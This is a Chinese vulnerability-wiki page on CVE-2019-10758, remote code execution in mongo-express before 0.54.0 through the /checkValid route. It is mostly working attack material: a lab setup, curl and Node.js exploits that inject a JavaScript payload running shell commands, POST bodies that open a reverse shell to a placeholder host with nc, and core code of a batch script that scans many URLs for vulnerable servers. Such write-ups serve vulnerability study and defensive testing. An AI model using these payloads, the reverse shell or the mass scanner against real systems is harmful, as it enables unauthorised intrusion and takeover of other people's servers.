menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Mongo express chevron_right (CVE-2019-10758)Mongo expres rce.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-10758)Mongo expres rce.md
    2.79 KB / 2021-04-21 09:23:46
        (CVE-2019-10758)Mongo expres rce
    ==================================
    
    一、漏洞简介
    ------------
    
    漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid
    从外部接收输入,并调用了存在 RCE
    漏洞的代码,由此存在被攻击的风险,可在服务器上进行任意命令执行。
    
    二、漏洞影响
    ------------
    
    mongo-express \< 0.54.0
    
    三、复现过程
    ------------
    
    https://github.com/ianxtianxt/CVE-2019-10758
    
    #### 安装环境
    
        docker run -p 27017:27017 -d mongo
        npm install [email protected] 
        cd node_modules/mongo-express/ && node app.js
    
    #### cURL exploit
    
        curl 'http://www.0-sec.org:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'
    
    ![](./resource/(CVE-2019-10758)Mongoexpresrce/media/rId26.png)
    
        curl 'http://www.0-sec.org:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > file.txt")'
    
    ![](./resource/(CVE-2019-10758)Mongoexpresrce/media/rId27.png)
    
    #### Script exploit
    
        node main.js
    
    #### main.js
    
        exploit = "this.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')"
    
        var bson = require('mongo-express/lib/bson')
        bson.toBSON(exploit)
    
    ### 补充
    
    > mongo-express远程代码执行,反弹shell代码如下:
    
    #### POST BODY 1:
    
        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("mkfifo /tmp/f")
    
    #### POST BODY 2:
    
        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("cat /tmp/f | /bin/sh -i 2>%261 | nc x.x.x.x 666 >/tmp/f")
    
    ### 批量监测脚本【只放核心代码】
    
        payload = r'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo 111111")'
    
        def http_request(url,path_out):
            try:
                print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
                vulurl = url + "/checkValid"
                r = requests.post(url=vulurl, headers=headers, data=payload, timeout=10, verify= False)
                if r.status_code == 200 and 'Valid' in r.text:
                    print("\033[1;40;32m'Good Found!' {}\033[0m".format(vulurl))
                    #printGreen("[+]" + url)
                    with open(path_out,'a') as f:
                        f.write(vulurl + '\n')
                else:
                    print("[-]" + "r.status_code:" + str(r.status_code) + "," + "raise.text:" + r.text)
            except Exception as err:
                print(err)
    
    
    links
    file_download